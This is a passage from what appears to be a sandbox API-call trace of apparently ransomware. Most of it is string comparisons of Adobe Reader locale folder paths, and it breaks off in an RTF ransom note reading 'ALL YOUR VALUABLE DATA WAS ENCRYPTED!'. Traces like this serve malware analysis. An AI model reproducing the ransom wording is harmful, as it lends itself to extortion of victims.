10.0\\Reader\\Locale\\fr_FR\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\", cchCount2=61) returned 1 [0081.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\", cchCount2=61) returned 1 [0081.138] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\", cchCount2=61) returned 1 [0081.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\", cchCount2=61) returned 1 [0081.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\", cchCount2=61) returned 1 [0081.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\", cchCount2=61) returned 2 [0081.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 2 [0081.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount2=61) returned 2 [0081.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 3 [0081.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 2 [0081.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 3 [0081.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 2 [0081.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.139] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 3 [0081.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 2 [0081.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\", cchCount2=70) returned 1 [0081.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\", cchCount2=70) returned 3 [0081.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\", cchCount2=70) returned 1 [0081.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\", cchCount2=70) returned 3 [0081.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 3 [0081.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 2 [0081.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.140] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 3 [0081.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 2 [0081.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 3 [0081.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 2 [0081.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 1 [0081.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 3 [0081.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount2=61) returned 2 [0081.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.141] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 3 [0081.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 2 [0081.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 3 [0081.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 2 [0081.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 3 [0081.142] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 2 [0081.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 3 [0081.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 2 [0081.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 3 [0081.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.143] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 2 [0081.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\", cchCount2=61) returned 1 [0081.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\", cchCount2=61) returned 3 [0081.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\", cchCount2=61) returned 1 [0081.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\", cchCount2=61) returned 1 [0081.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\", cchCount2=61) returned 1 [0081.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 3 [0081.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 2 [0081.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\", cchCount2=61) returned 1 [0081.144] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\", cchCount2=61) returned 3 [0081.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\", cchCount2=61) returned 1 [0081.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\", cchCount2=61) returned 1 [0081.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\", cchCount2=61) returned 2 [0081.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchCount2=70) returned 1 [0081.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchCount2=70) returned 3 [0081.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchCount2=70) returned 1 [0081.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchCount2=70) returned 1 [0081.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchCount2=70) returned 1 [0081.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 1 [0081.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 1 [0081.145] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 3 [0081.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 2 [0081.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 1 [0081.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 1 [0081.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\fr_FR\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 3 [0081.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount1=61, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\eu_ES\\", cchCount2=61) returned 2 [0081.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\cs_CZ\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0081.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\es_ES\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 3 [0081.146] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\da_DK\\Services\\", cchCount1=70, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\de_DE\\", cchCount2=61) returned 1 [0135.748] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur 